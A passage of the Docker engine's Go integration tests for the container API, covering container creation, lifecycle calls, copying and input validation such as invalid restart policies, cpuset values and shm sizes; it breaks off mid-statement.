+ +func (s *DockerSuite) TestContainerAPICreateOtherNetworkModes(c *check.C) { + // Windows does not support these network modes + testRequires(c, DaemonIsLinux, NotUserNamespace) + UtilCreateNetworkMode(c, "host") + UtilCreateNetworkMode(c, "container:web1") +} + +func UtilCreateNetworkMode(c *check.C, networkMode string) { + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{"NetworkMode": networkMode}, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + c.Assert(containerJSON.HostConfig.NetworkMode, checker.Equals, containertypes.NetworkMode(networkMode), check.Commentf("Mismatched NetworkMode")) +} + +func (s *DockerSuite) TestContainerAPICreateWithCpuSharesCpuset(c *check.C) { + // TODO Windows to Windows CI. The CpuShares part could be ported. + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "CpuShares": 512, + "CpusetCpus": "0", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), checker.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + + c.Assert(json.Unmarshal(body, &containerJSON), checker.IsNil) + + out := inspectField(c, containerJSON.ID, "HostConfig.CpuShares") + c.Assert(out, checker.Equals, "512") + + outCpuset := inspectField(c, containerJSON.ID, "HostConfig.CpusetCpus") + c.Assert(outCpuset, checker.Equals, "0") +} + +func (s *DockerSuite) TestContainerAPIVerifyHeader(c *check.C) { + config := map[string]interface{}{ + "Image": "busybox", + } + + create := func(ct string) (*http.Response, io.ReadCloser, error) { + jsonData := bytes.NewBuffer(nil) + c.Assert(json.NewEncoder(jsonData).Encode(config), checker.IsNil) + return sockRequestRaw("POST", "/containers/create", jsonData, ct) + } + + // Try with no content-type + res, body, err := create("") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + body.Close() + + // Try with wrong content-type + res, body, err = create("application/xml") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + body.Close() + + // now application/json + res, body, err = create("application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) + body.Close() +} + +//Issue 14230. daemon should return 500 for invalid port syntax +func (s *DockerSuite) TestContainerAPIInvalidPortSyntax(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "NetworkMode": "default", + "PortBindings": { + "19039;1230": [ + {} + ] + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "invalid port") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyInvalidPolicyName(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "something", + "MaximumRetryCount": 0 + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "invalid restart policy") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyRetryMismatch(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "always", + "MaximumRetryCount": 2 + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be used with restart policy") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyNegativeRetryCount(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "on-failure", + "MaximumRetryCount": -2 + } + } + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + c.Assert(string(b[:]), checker.Contains, "maximum retry count cannot be negative") +} + +func (s *DockerSuite) TestContainerAPIRestartPolicyDefaultRetryCount(c *check.C) { + config := `{ + "Image": "busybox", + "HostConfig": { + "RestartPolicy": { + "Name": "on-failure", + "MaximumRetryCount": 0 + } + } + }` + + res, _, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) +} + +// Issue 7941 - test to make sure a "null" in JSON is just ignored. +// W/o this fix a null in JSON would be parsed into a string var as "null" +func (s *DockerSuite) TestContainerAPIPostCreateNull(c *check.C) { + config := `{ + "Hostname":"", + "Domainname":"", + "Memory":0, + "MemorySwap":0, + "CpuShares":0, + "Cpuset":null, + "AttachStdin":true, + "AttachStdout":true, + "AttachStderr":true, + "ExposedPorts":{}, + "Tty":true, + "OpenStdin":true, + "StdinOnce":true, + "Env":[], + "Cmd":"ls", + "Image":"busybox", + "Volumes":{}, + "WorkingDir":"", + "Entrypoint":null, + "NetworkDisabled":false, + "OnBuild":null}` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) + + b, err := readBody(body) + c.Assert(err, checker.IsNil) + type createResp struct { + ID string + } + var container createResp + c.Assert(json.Unmarshal(b, &container), checker.IsNil) + out := inspectField(c, container.ID, "HostConfig.CpusetCpus") + c.Assert(out, checker.Equals, "") + + outMemory := inspectField(c, container.ID, "HostConfig.Memory") + c.Assert(outMemory, checker.Equals, "0") + outMemorySwap := inspectField(c, container.ID, "HostConfig.MemorySwap") + c.Assert(outMemorySwap, checker.Equals, "0") +} + +func (s *DockerSuite) TestCreateWithTooLowMemoryLimit(c *check.C) { + // TODO Windows: Port once memory is supported + testRequires(c, DaemonIsLinux) + config := `{ + "Image": "busybox", + "Cmd": "ls", + "OpenStdin": true, + "CpuShares": 100, + "Memory": 524287 + }` + + res, body, err := sockRequestRaw("POST", "/containers/create", strings.NewReader(config), "application/json") + c.Assert(err, checker.IsNil) + b, err2 := readBody(body) + c.Assert(err2, checker.IsNil) + + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") +} + +func (s *DockerSuite) TestContainerAPIRename(c *check.C) { + out, _ := dockerCmd(c, "run", "--name", "TestContainerAPIRename", "-d", "busybox", "sh") + + containerID := strings.TrimSpace(out) + newName := "TestContainerAPIRenameNew" + statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/rename?name="+newName, nil) + c.Assert(err, checker.IsNil) + // 204 No Content is expected, not 200 + c.Assert(statusCode, checker.Equals, http.StatusNoContent) + + name := inspectField(c, containerID, "Name") + c.Assert(name, checker.Equals, "/"+newName, check.Commentf("Failed to rename container")) +} + +func (s *DockerSuite) TestContainerAPIKill(c *check.C) { + name := "test-api-kill" + runSleepingContainer(c, "-i", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/kill", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + state := inspectField(c, name, "State.Running") + c.Assert(state, checker.Equals, "false", check.Commentf("got wrong State from container %s: %q", name, state)) +} + +func (s *DockerSuite) TestContainerAPIRestart(c *check.C) { + name := "test-api-restart" + runSleepingContainer(c, "-di", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/restart?t=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) +} + +func (s *DockerSuite) TestContainerAPIRestartNotimeoutParam(c *check.C) { + name := "test-api-restart-no-timeout-param" + out, _ := runSleepingContainer(c, "-di", "--name", name) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("POST", "/containers/"+name+"/restart", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Restarting }} {{ .State.Running }}", "false true", 15*time.Second), checker.IsNil) +} + +func (s *DockerSuite) TestContainerAPIStart(c *check.C) { + name := "testing-start" + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + "OpenStdin": true, + } + + status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + // second call to start should give 304 + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + + // TODO(tibor): figure out why this doesn't work on windows + if isLocalDaemon { + c.Assert(status, checker.Equals, http.StatusNotModified) + } +} + +func (s *DockerSuite) TestContainerAPIStop(c *check.C) { + name := "test-api-stop" + runSleepingContainer(c, "-i", "--name", name) + + status, _, err := sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + + // second call to start should give 304 + status, _, err = sockRequest("POST", "/containers/"+name+"/stop?t=30", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotModified) +} + +func (s *DockerSuite) TestContainerAPIWait(c *check.C) { + name := "test-api-wait" + + sleepCmd := "/bin/sleep" + if daemonPlatform == "windows" { + sleepCmd = "sleep" + } + dockerCmd(c, "run", "--name", name, "busybox", sleepCmd, "2") + + status, body, err := sockRequest("POST", "/containers/"+name+"/wait", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(waitInspect(name, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) + + var waitres containertypes.ContainerWaitOKBody + c.Assert(json.Unmarshal(body, &waitres), checker.IsNil) + c.Assert(waitres.StatusCode, checker.Equals, int64(0)) +} + +func (s *DockerSuite) TestContainerAPICopyNotExistsAnyMore(c *check.C) { + name := "test-container-api-copy" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "/test.txt", + } + + status, _, err := sockRequest("POST", "/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestContainerAPICopyPre124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "/test.txt", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + found := false + for tarReader := tar.NewReader(bytes.NewReader(body)); ; { + h, err := tarReader.Next() + if err != nil { + if err == io.EOF { + break + } + c.Fatal(err) + } + if h.Name == "test.txt" { + found = true + break + } + } + c.Assert(found, checker.True) +} + +func (s *DockerSuite) TestContainerAPICopyResourcePathEmptyPr124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy-resource-empty" + dockerCmd(c, "run", "--name", name, "busybox", "touch", "/test.txt") + + postData := types.CopyConfig{ + Resource: "", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Matches, "Path cannot be empty\n") +} + +func (s *DockerSuite) TestContainerAPICopyResourcePathNotFoundPre124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + name := "test-container-api-copy-resource-not-found" + dockerCmd(c, "run", "--name", name, "busybox") + + postData := types.CopyConfig{ + Resource: "/notexist", + } + + status, body, err := sockRequest("POST", "/v1.23/containers/"+name+"/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Matches, "Could not find the file /notexist in container "+name+"\n") +} + +func (s *DockerSuite) TestContainerAPICopyContainerNotFoundPr124(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + postData := types.CopyConfig{ + Resource: "/something", + } + + status, _, err := sockRequest("POST", "/v1.23/containers/notexists/copy", postData) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestContainerAPIDelete(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + dockerCmd(c, "stop", id) + + status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) +} + +func (s *DockerSuite) TestContainerAPIDeleteNotExist(c *check.C) { + status, body, err := sockRequest("DELETE", "/containers/doesnotexist", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) + c.Assert(getErrorMessage(c, body), checker.Matches, "No such container: doesnotexist") +} + +func (s *DockerSuite) TestContainerAPIDeleteForce(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id+"?force=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) +} + +func (s *DockerSuite) TestContainerAPIDeleteRemoveLinks(c *check.C) { + // Windows does not support links + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "--name", "tlink1", "busybox", "top") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + out, _ = dockerCmd(c, "run", "--link", "tlink1:tlink1", "--name", "tlink2", "-d", "busybox", "top") + + id2 := strings.TrimSpace(out) + c.Assert(waitRun(id2), checker.IsNil) + + links := inspectFieldJSON(c, id2, "HostConfig.Links") + c.Assert(links, checker.Equals, "[\"/tlink1:/tlink2/tlink1\"]", check.Commentf("expected to have links between containers")) + + status, b, err := sockRequest("DELETE", "/containers/tlink2/tlink1?link=1", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNoContent, check.Commentf(string(b))) + + linksPostRm := inspectFieldJSON(c, id2, "HostConfig.Links") + c.Assert(linksPostRm, checker.Equals, "null", check.Commentf("call to api deleteContainer links should have removed the specified links")) +} + +func (s *DockerSuite) TestContainerAPIDeleteConflict(c *check.C) { + out, _ := runSleepingContainer(c) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) +} + +func (s *DockerSuite) TestContainerAPIDeleteRemoveVolume(c *check.C) { + testRequires(c, SameHostDaemon) + + vol := "/testvolume" + if daemonPlatform == "windows" { + vol = `c:\testvolume` + } + + out, _ := runSleepingContainer(c, "-v", vol) + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + source, err := inspectMountSourceField(id, vol) + _, err = os.Stat(source) + c.Assert(err, checker.IsNil) + + status, _, err := sockRequest("DELETE", "/containers/"+id+"?v=1&force=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + _, err = os.Stat(source) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf("expected to get ErrNotExist error, got %v", err)) +} + +// Regression test for https://github.com/docker/docker/issues/6231 +func (s *DockerSuite) TestContainerAPIChunkedEncoding(c *check.C) { + conn, err := sockConn(time.Duration(10*time.Second), "") + c.Assert(err, checker.IsNil) + client := httputil.NewClientConn(conn, nil) + defer client.Close() + + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": append([]string{"/bin/sh", "-c"}, sleepCommandForDaemonPlatform()...), + "OpenStdin": true, + } + b, err := json.Marshal(config) + c.Assert(err, checker.IsNil) + + req, err := http.NewRequest("POST", "/containers/create", bytes.NewBuffer(b)) + c.Assert(err, checker.IsNil) + req.Header.Set("Content-Type", "application/json") + // This is a cheat to make the http request do chunked encoding + // Otherwise (just setting the Content-Encoding to chunked) net/http will overwrite + // https://golang.org/src/pkg/net/http/request.go?s=11980:12172 + req.ContentLength = -1 + + resp, err := client.Do(req) + c.Assert(err, checker.IsNil, check.Commentf("error creating container with chunked encoding")) + resp.Body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusCreated) +} + +func (s *DockerSuite) TestContainerAPIPostContainerStop(c *check.C) { + out, _ := runSleepingContainer(c) + + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + statusCode, _, err := sockRequest("POST", "/containers/"+containerID+"/stop", nil) + c.Assert(err, checker.IsNil) + // 204 No Content is expected, not 200 + c.Assert(statusCode, checker.Equals, http.StatusNoContent) + c.Assert(waitInspect(containerID, "{{ .State.Running }}", "false", 60*time.Second), checker.IsNil) +} + +// #14170 +func (s *DockerSuite) TestPostContainerAPICreateWithStringOrSliceEntrypoint(c *check.C) { + config := struct { + Image string + Entrypoint string + Cmd []string + }{"busybox", "echo", []string{"hello", "world"}} + _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "start", "-a", "echotest") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") + + config2 := struct { + Image string + Entrypoint []string + Cmd []string + }{"busybox", []string{"echo"}, []string{"hello", "world"}} + _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + c.Assert(err, checker.IsNil) + out, _ = dockerCmd(c, "start", "-a", "echotest2") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") +} + +// #14170 +func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCmd(c *check.C) { + config := struct { + Image string + Entrypoint string + Cmd string + }{"busybox", "echo", "hello world"} + _, _, err := sockRequest("POST", "/containers/create?name=echotest", config) + c.Assert(err, checker.IsNil) + out, _ := dockerCmd(c, "start", "-a", "echotest") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") + + config2 := struct { + Image string + Cmd []string + }{"busybox", []string{"echo", "hello", "world"}} + _, _, err = sockRequest("POST", "/containers/create?name=echotest2", config2) + c.Assert(err, checker.IsNil) + out, _ = dockerCmd(c, "start", "-a", "echotest2") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello world") +} + +// regression #14318 +func (s *DockerSuite) TestPostContainersCreateWithStringOrSliceCapAddDrop(c *check.C) { + // Windows doesn't support CapAdd/CapDrop + testRequires(c, DaemonIsLinux) + config := struct { + Image string + CapAdd string + CapDrop string + }{"busybox", "NET_ADMIN", "SYS_ADMIN"} + status, _, err := sockRequest("POST", "/containers/create?name=capaddtest0", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + config2 := struct { + Image string + CapAdd []string + CapDrop []string + }{"busybox", []string{"NET_ADMIN", "SYS_ADMIN"}, []string{"SETGID"}} + status, _, err = sockRequest("POST", "/containers/create?name=capaddtest1", config2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) +} + +// #14915 +func (s *DockerSuite) TestContainerAPICreateNoHostConfig118(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only support 1.25 or later + config := struct { + Image string + }{"busybox"} + status, _, err := sockRequest("POST", "/v1.18/containers/create", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) +} + +// Ensure an error occurs when you have a container read-only rootfs but you +// extract an archive to a symlink in a writable volume which points to a +// directory outside of the volume. +func (s *DockerSuite) TestPutContainerArchiveErrSymlinkInVolumeToReadOnlyRootfs(c *check.C) { + // Windows does not support read-only rootfs + // Requires local volume mount bind. + // --read-only + userns has remount issues + testRequires(c, SameHostDaemon, NotUserNamespace, DaemonIsLinux) + + testVol := getTestDir(c, "test-put-container-archive-err-symlink-in-volume-to-read-only-rootfs-") + defer os.RemoveAll(testVol) + + makeTestContentInDir(c, testVol) + + cID := makeTestContainer(c, testContainerOptions{ + readOnly: true, + volumes: defaultVolumes(testVol), // Our bind mount is at /vol2 + }) + defer deleteContainer(cID) + + // Attempt to extract to a symlink in the volume which points to a + // directory outside the volume. This should cause an error because the + // rootfs is read-only. + query := make(url.Values, 1) + query.Set("path", "/vol2/symlinkToAbsDir") + urlPath := fmt.Sprintf("/v1.20/containers/%s/archive?%s", cID, query.Encode()) + + statusCode, body, err := sockRequest("PUT", urlPath, nil) + c.Assert(err, checker.IsNil) + + if !isCpCannotCopyReadOnly(fmt.Errorf(string(body))) { + c.Fatalf("expected ErrContainerRootfsReadonly error, but got %d: %s", statusCode, string(body)) + } +} + +func (s *DockerSuite) TestContainerAPIGetContainersJSONEmpty(c *check.C) { + status, body, err := sockRequest("GET", "/containers/json?all=1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(string(body), checker.Equals, "[]\n") +} + +func (s *DockerSuite) TestPostContainersCreateWithWrongCpusetValues(c *check.C) { + // Not supported on Windows + testRequires(c, DaemonIsLinux) + + c1 := struct { + Image string + CpusetCpus string + }{"busybox", "1-42,,"} + name := "wrong-cpuset-cpus" + status, body, err := sockRequest("POST", "/containers/create?name="+name, c1) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + expected := "Invalid value 1-42,, for cpuset cpus" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + + c2 := struct { + Image string + CpusetMems string + }{"busybox", "42-3,1--"} + name = "wrong-cpuset-mems" + status, body, err = sockRequest("POST", "/containers/create?name="+name, c2) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + expected = "Invalid value 42-3,1-- for cpuset mems" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeNegative(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{"ShmSize": -1}, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + c.Assert(getErrorMessage(c, body), checker.Contains, "SHM size can not be less than 0") +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeHostConfigOmitted(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + var defaultSHMSize int64 = 67108864 + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": "mount", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, defaultSHMSize) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegexp.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateShmSizeOmitted(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "HostConfig": map[string]interface{}{}, + "Cmd": "mount", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(67108864)) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegexp := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=65536k`) + if !shmRegexp.MatchString(out) { + c.Fatalf("Expected shm of 64MB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateWithShmSize(c *check.C) { + // ShmSize is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": "mount", + "HostConfig": map[string]interface{}{"ShmSize": 1073741824}, + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(containerJSON.HostConfig.ShmSize, check.Equals, int64(1073741824)) + + out, _ := dockerCmd(c, "start", "-i", containerJSON.ID) + shmRegex := regexp.MustCompile(`shm on /dev/shm type tmpfs(.*)size=1048576k`) + if !shmRegex.MatchString(out) { + c.Fatalf("Expected shm of 1GB in mount command, got %v", out) + } +} + +func (s *DockerSuite) TestPostContainersCreateMemorySwappinessHostConfigOmitted(c *check.C) { + // Swappiness is not supported on Windows + testRequires(c, DaemonIsLinux) + config := map[string]interface{}{ + "Image": "busybox", + } + + status, body, err := sockRequest("POST", "/containers/create", config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusCreated) + + var container containertypes.ContainerCreateCreatedBody + c.Assert(json.Unmarshal(body, &container), check.IsNil) + + status, body, err = sockRequest("GET", "/containers/"+container.ID+"/json", nil) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusOK) + + var containerJSON types.ContainerJSON + c.Assert(json.Unmarshal(body, &containerJSON), check.IsNil) + + c.Assert(*containerJSON.HostConfig.MemorySwappiness, check.Equals, int64(-1)) +} + +// check validation is done daemon side and not only in cli +func (s *DockerSuite) TestPostContainersCreateWithOomScoreAdjInvalidRange(c *check.C) { + // OomScoreAdj is not supported on Windows + testRequires(c, DaemonIsLinux) + + config := struct { + Image string + OomScoreAdj int + }{"busybox", 1001} + name := "oomscoreadj-over" + status, b, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + + expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]" + msg := getErrorMessage(c, b) + if !strings.Contains(msg, expected) { + c.Fatalf("Expected output to contain %q, got %q", expected, msg) + } + + config = struct { + Image string + OomScoreAdj int + }{"busybox", -1001} + name = "oomscoreadj-low" + status, b, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]" + msg = getErrorMessage(c, b) + if !strings.Contains(msg, expected) { + c.Fatalf("Expected output to contain %q, got %q", expected, msg) + } +} + +// test case for #22210 where an empty container name caused panic. +func (s *DockerSuite) TestContainerAPIDeleteWithEmptyName(c *check.C) { + status, out, err := sockRequest("DELETE", "/containers/", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(string(out), checker.Contains, "No container name or ID supplied") +} + +func (s *DockerSuite) TestContainerAPIStatsWithNetworkDisabled(c *check.C) { + // Problematic on Windows as Windows does not support stats + testRequires(c, DaemonIsLinux) + + name := "testing-network-disabled" + config := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"top"}, + "NetworkDisabled": true, + } + + status, _, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + status, _, err = sockRequest("POST", "/containers/"+name+"/start", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + c.Assert(waitRun(name), check.IsNil) + + type b struct { + status int + body []byte + err error + } + bc := make(chan b, 1) + go func() { + status, body, err := sockRequest("GET", 